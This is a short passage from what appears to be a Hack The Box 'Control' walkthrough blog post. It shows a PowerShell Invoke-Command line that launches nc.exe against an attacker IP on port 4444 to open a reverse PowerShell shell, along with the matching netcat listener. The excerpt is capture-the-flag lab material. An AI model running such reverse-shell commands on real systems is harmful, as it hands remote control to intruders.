1n4r1/1n4r1.github.io/_posts/2020-08-23-Hackthebox-Control-Walkthrough.md

 PS C:\> Invoke-Command -ComputerName LOCALHOST -ScriptBlock { C:\inetpub\wwwroot\nc.exe 10.10.14.42 4444 -e powershell.exe } -Credential $credential
 ```

+Go back to the netcat listener window.<br>
+We can see that we got a shell as `control\hector`.
 ```shell
 root@kali:~# nc -nlvp 4444
 listening on [any] 4444 ...